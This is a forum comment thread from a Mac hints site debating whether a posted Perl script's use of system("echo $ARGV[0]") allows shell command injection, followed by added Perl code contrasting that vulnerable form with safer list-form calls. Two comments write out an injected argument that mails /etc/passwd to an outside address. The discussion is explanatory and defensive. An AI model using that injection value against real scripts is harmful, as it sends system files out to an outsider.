Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 04:53:38PM
(Sorry for reposting this; the > was un-entitized when I previewed and cut off some of the post... seems like a bug) You don't consider something like this a security issue? This is essentially what your code does:

system("echo $ARGV[0]");

Now, if the script was named foo.pl and called like:

foo.pl ";mail me@me.com < /etc/passwd"

I'd get your passwd file. Or, perform whatever (multiple) shell functions I can with the permissions of the script. That's a security issue, and a basic one. I appreciate that you posted a hint, don't get me wrong... but too many times people take code from hint sites and use them, not knowing the danger that can be caused. Code with glaring security holes shouldn't be posted... in my opinion :)

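An added example of the fix for the one-argument system() call quoted above (this is not code from the hint or from any poster in the thread): Perl's list-form system() and list-form pipe open run the program directly, with no shell in between, so whatever is in $ARGV[0] is passed to the program as literal text. The sample input is constructed for the demonstration.

```perl
#!/usr/bin/perl
# Added example, not from the original hint or thread. The one-argument
# system("echo $ARGV[0]") hands a single string to /bin/sh, which parses
# shell metacharacters (; | ` $ etc.) in the argument as commands. The
# multi-argument forms below never start a shell.
use strict;
use warnings;

# Vulnerable: interpolated into one string, then parsed by the shell.
# Kept here only for contrast; never call it with untrusted input.
sub echo_via_shell {
    my ($arg) = @_;
    return system("echo $arg");
}

# Hardened: list form with more than one element. Perl calls execvp()
# directly, so $arg arrives in echo's argv exactly as given.
sub echo_without_shell {
    my ($arg) = @_;
    return system('echo', $arg);
}

# Hardened capture variant: list-form pipe open gives the same no-shell
# guarantee when you need the command's output in the script.
sub capture_without_shell {
    my ($arg) = @_;
    open(my $fh, '-|', 'echo', $arg) or die "cannot run echo: $!";
    my $out = do { local $/; <$fh> };
    close $fh;
    return $out;
}

# Constructed input containing a shell separator. Under the shell form
# the text after ';' would be run as a second command; under the list
# form it is simply echoed back as part of the argument.
my $sample = defined $ARGV[0] ? $ARGV[0] : 'a; b';
print capture_without_shell($sample);
```

Note that a single-element list (system('echo')) can still be routed through the shell if it contains metacharacters; the no-shell behaviour needs at least two list elements, as shown.
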
Use LaTeX formatted equations in Keynote
Authored by: EddEdmondson on Feb 20, '03 06:28:06PM

The reason I don't consider that a security issue is that if you've got access to perl and the command prompt anyway you can just get the file without faffing around with my script.

Sure, it's a bad idea, but it doesn't give an attacker any extra abilities they don't already have - unlike your point about tmp. Unless I'm missing something very obvious, in which case I'll accept your point. I tend to just write this sort of thing for my own use, and like I said would let other people fix bugs etc. in comments.
Use LaTeX formatted equations in Keynote
Authored by: mithras on Feb 21, '03 11:53:44AM

That would be a security issue IF the script were being called from the Web or an unprivileged environment.

But your example would require the user to be able to run the command on the Mac anyway. Why call the script, if you can just run "mail me@my.com < /etc/passwd" directly?

Consider what is wrong with this statement: the 'sh' program is a HUGE security hole! It will just run willy-nilly any command you pass to it!

--
my free OS X applications and scripts: http://mithras.homeunix.net/downloads
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 01:54:14PM

You people are missing the point. The script is being posted on a "hints" site, and it is not secure. If it is on a multi-user environment, it can be dangerous. This isn't rocket science, it is Security 101. Posting insecure scripts on a 'hints' site is plain wrong. Period.